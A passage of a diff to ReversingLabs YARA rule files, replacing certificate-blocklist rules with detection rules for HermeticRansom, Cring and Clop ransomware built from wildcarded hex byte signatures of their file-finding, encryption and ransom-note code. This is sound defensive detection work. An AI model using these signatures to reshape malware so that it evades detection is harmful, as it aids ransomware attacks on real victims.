+            ?? 83 C4 ?? 88 85 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83
+            7D ?? ?? 8D 4D ?? 8A 85 ?? ?? ?? ?? 0F 43 4D ?? C7 45 ?? ?? ?? ?? ?? 88 01 C6 41 ??
+            ?? 33 C9 8B 75 ?? 8B C6 83 C0 ?? 0F 92 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            4D ?? 83 7D ?? ?? 8B F8 0F 43 4D ?? 56 57 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F BE
+            07 FF B5 ?? ?? ?? ?? 35 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B
+            BD ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ??
+            83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            45 ?? 83 7D ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 32 D2 C7 45 ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 8D 50 ?? 8B C1
+            81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ??
+            ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ??
+            ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$misc_checks_p1 = {
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83
+            F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ??
+            ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F
+            84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+        }
+		$misc_checks_p2 = {
+            85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ??
+            ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? E9
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MUSTER PLUS SP Z O O" and pe.signatures [ i ] . serial == "04:4e:05:bb:1a:01:a1:cb:b5:0c:fb:6c:d2:4e:5d:6b" and 1601427600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $misc_checks_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B7F19B13De9Bee8A52Ff365Ced6F67Fa : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Hermeticransom : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects HermeticRansom ransomware."
 		author = "ReversingLabs"
-		id = "0e7e235e-3f0b-5396-9c19-9336d9cbb95a"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "6aaf89f4-0cf8-5f0e-b89d-01ac7edd06c0"
+		date = "2022-05-13"
+		modified = "2022-05-13"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6328-L6346"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a8d2a92b44cdd7b123907a6a77ba0fc9fde4961f9ac846b36f1e87730a1efae6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win64.Ransomware.HermeticRansom.yara#L1-L105"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "123d569a9d9b9d855b3baafd6194f102d82a594fd7a2bba073843a8654a317cb"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "HermeticRansom"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$drop_ransom_note = {
+            65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 3B 41 ??
+            0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 0F 10 04 24 0F 11 44 24 ?? 0F 10 44 24 ?? 0F 11 44 24 ?? 0F 10 44
+            24 ?? 0F 11 04 24 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8D BC 24 ?? ?? ??
+            ?? 48 8D 35 ?? ?? ?? ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48 8B 6D ?? 48
+            89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ??
+            ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ??
+            ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 C7 04 24 ?? ?? ?? ?? 48
+            8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 4C 24 ?? 48 89 8C 24 ?? ??
+            ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 14 24 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            8B 44 24 ?? 48 8B 4C 24 ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 14 24 48 89 4C 24 ?? 48 89
+            44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24
+            ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            8B 44 24 ?? 48 8B 4C 24 ?? 48 89 0C 24 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4C
+            24 ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 48 8D 15 ?? ?? ??
+            ?? 48 89 54 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48
+        }
+		$encrypt_files_p1 = {
+            E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 8C 24 ??
+            ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 89 14 24
+            48 89 74 24 ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 C7 44 24 ?? ??
+            ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 54 24 ?? E8
+            ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 9C 24 ?? ?? ?? ?? 48
+            85 DB 0F 85 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24 ?? 48 89 94 24 ?? ?? ?? ?? 48 8D
+            05 ?? ?? ?? ?? 48 89 04 24 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 04 24 48 8B 44 24 ?? 48 89 C1 48 C1 F8 ?? 48
+            C1 E8 ?? 48 01 C8 48 C1 F8 ?? 48 89 84 24 ?? ?? ?? ?? 48 C1 E0 ?? 48 29 C1 48 89 4C
+            24 ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 04 24 0F 57 C0 0F
+            11 44 24 ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 83 F8 ?? 7E ?? B8 ?? ?? ?? ??
+            48 89 84 24 ?? ?? ?? ?? 31 C9 EB ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ??
+            48 39 C1 0F 8D ?? ?? ?? ?? 48 89 CA 48 C1 E1 ?? 48 FF C2 48 89 D3 48 C1 E2 ?? 48 39
+            D1 0F 87 ?? ?? ?? ?? 48 8B 74 24 ?? 48 39 F2 0F 87 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ??
+            ?? 48 8B 05 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? 48 89 3C 24 48 89
+        }
+		$encrypt_files_p2 = {
+            5C 24 ?? 48 89 44 24 ?? 48 29 CE 48 89 F3 48 F7 DE 48 C1 FE ?? 48 21 CE 48 8B BC 24
+            ?? ?? ?? ?? 48 01 FE 48 89 74 24 ?? 48 29 CA 48 89 54 24 ?? 48 89 5C 24 ?? E8 ?? ??
+            ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 48 85 DB 0F 85 ??
+            ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 89 1C 24 48 89 44 24 ?? 48 89 4C 24 ?? 48 89 54
+            24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 83 F8 ?? 0F 8D ?? ?? ?? ?? 48 C1 E0 ?? 48 8B
+            4C 24 ?? 48 39 C8 0F 87 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B
+            35 ?? ?? ?? ?? 48 89 14 24 48 89 5C 24 ?? 48 89 74 24 ?? 48 8B 54 24 ?? 48 29 C2 48
+            89 D3 48 F7 DA 48 C1 FA ?? 48 21 C2 48 8B B4 24 ?? ?? ?? ?? 48 01 F2 48 89 54 24 ??
+            48 29 C1 48 89 4C 24 ?? 48 89 5C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ??
+            48 8B 54 24 ?? 48 8B 5C 24 ?? 48 85 DB 74 ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 8C 24 ??
+            ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48
+            81 C4 ?? ?? ?? ?? C3 48 8B 9C 24 ?? ?? ?? ?? 48 89 1C 24 48 89 44 24 ?? 48 89 4C 24
+            ?? 48 89 54 24 ?? E8 ?? ?? ?? ?? 48 8B 84 24
+        }
+		$find_files = {
+            65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83
+            EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ??
+            48 89 44 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54
+            24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 89 54
+            24 ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 C7 44 24 ?? ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 4C 24 ?? 48 89 4C 24 ?? 48 8B 94
+            24 ?? ?? ?? ?? 48 89 14 24 48 8B 9C 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 44 24 ?? 48
+            89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8B 84 24 ??
+            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 04 24 48 89 4C 24 ?? 48 C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 85 C9 75
+            ?? 48 89 44 24 ?? 48 89 04 24 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 85 C0 74 ?? 48 8B 44
+            24 ?? 48 89 04 24 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 C4 ??
+            C3 48 8B 44 24 ?? 48 89 04 24 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 6C 24 ??
+            48 83 C4 ?? C3 48 89 04 24 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 6C 24 ?? 48
+            83 C4 ?? C3 48 8B 44 24
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALEXIS SECURITY GROUP, LLC" and ( pe.signatures [ i ] . serial == "00:b7:f1:9b:13:de:9b:ee:8a:52:ff:36:5c:ed:6f:67:fa" or pe.signatures [ i ] . serial == "b7:f1:9b:13:de:9b:ee:8a:52:ff:36:5c:ed:6f:67:fa" ) and 1574914319 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B61B8E71514059Adc604Da05C283E514 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Cring : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Cring ransomware."
 		author = "ReversingLabs"
-		id = "2587d30d-e9c8-599c-9cc4-4d4a7aa83c34"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "76530a6d-145b-5316-8200-4b191d0754fd"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6348-L6366"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1255cef74082c9cad41ac8e7d62e740f69e6ba44171bb45655a68ee5db204e57"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.Cring.yara#L1-L66"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "05cf60ad39c9dcc592345f13b63c99b153b9253297a8ad9e52e0439081d8c796"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Cring"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 08 6F ?? ?? ?? ?? 19 2E ?? 08 6F ?? ?? ?? ??
+            18 33 ?? 08 6F ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 02 17 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            0D 2B ?? 09 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 2D ?? DE ?? 09 2C ?? 09 6F
+            ?? ?? ?? ?? DC 07 17 58 0B 07 06 8E 69 32 ?? 2A
+        }
+		$find_files_p2 = {
+            02 7B ?? ?? ?? ?? 0B 07 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 16 0A DD ??
+            ?? ?? ?? 02 15 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ??
+            ?? ?? 14 0C 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DE ?? 26 DE ?? 08 2C
+            ?? 02 08 7D ?? ?? ?? ?? 02 16 7D ?? ?? ?? ?? 2B ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ??
+            9A 0D 02 09 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 17 0A DD ?? ?? ?? ?? 02 15 7D ?? ?? ??
+            ?? 02 02 7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 8E 69
+            32 ?? 02 14 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 39 ?? ?? ?? ?? 14 0C 02 7B ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 0C DE ?? 26 DE ?? 08 39 ?? ?? ?? ?? 02 08 7D ?? ?? ?? ?? 02 16 7D ?? ?? ??
+            ?? 38 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 9A 13 ?? 02 11 ?? 02 7B ?? ?? ??
+            ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 1F ?? 7D ?? ?? ??
+            ?? 2B ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 02 11 ?? 7D ?? ?? ?? ?? 02 18 7D ?? ??
+            ?? ?? 17 0A DE ?? 02 1F ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 28
+            ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 7B ?? ??
+            ?? ?? 02 7B ?? ?? ?? ?? 8E 69 3F ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 16 0A DE ?? 02 28 ??
+            ?? ?? ?? DC 06 2A
+        }
+		$encrypt_files = {
+            16 0A 73 ?? ?? ?? ?? 0B 07 6F ?? ?? ?? ?? 1E 5B 8D ?? ?? ?? ?? 0C 07 6F ?? ?? ?? ?? 1E
+            5B 8D ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 08 6F ?? ?? ?? ?? 11 ?? 09 6F ?? ?? ??
+            ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 8E 69 09 8E 69 58 8D ?? ?? ?? ?? 13 ??
+            08 11 ?? 08 8E 69 28 ?? ?? ?? ?? 09 16 11 ?? 08 8E 69 09 8E 69 28 ?? ?? ?? ?? 11 ?? 04
+            28 ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 28 ?? ?? ?? ?? 13 ?? 07 08 09 6F ?? ?? ?? ?? 13 ?? 02
+            19 73 ?? ?? ?? ?? 13 ?? 03 18 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 73 ?? ?? ?? ?? 13 ??
+            11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11
+            ?? 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ??
+            2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F
+            ?? ?? ?? ?? DC 17 0A DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APP DIVISION ApS" and ( pe.signatures [ i ] . serial == "00:b6:1b:8e:71:51:40:59:ad:c6:04:da:05:c2:83:e5:14" or pe.signatures [ i ] . serial == "b6:1b:8e:71:51:40:59:ad:c6:04:da:05:c2:83:e5:14" ) and 1603328400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Ece6Cbf67Dc41635A5E5D075F286Af23 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Clop : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Clop ransomware."
 		author = "ReversingLabs"
-		id = "3e451a5a-835b-572d-ab17-ff52d3614a86"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "0ea63119-3773-5404-b332-8e3966fd35df"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6368-L6386"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f560e6f4a65eaac8db1d8accb0748de17048e66ccf989468e6350a3ec1d70dc8"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Clop.yara#L1-L109"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0b63db16a4b1cae27a97d0ff9df692a63f1a11120ffac69c05a5c71fbd224007"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Clop"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 6A ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ??
+            83 C4 ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 BD ??
+            ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 68 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 8D ?? ?? ??
+            ?? 51 FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ??
+            ?? 8B 88 ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 8B 82 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 8B
+            91 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8
+            ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ??
+            ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 BD ?? ?? ?? ?? ?? 74 ??
+            68 ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74
+            ?? 68 ?? ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
+            74 ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ??
+            ?? ?? 52 FF 15
+        }
+		$encrypt_files_p2 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 50 8D
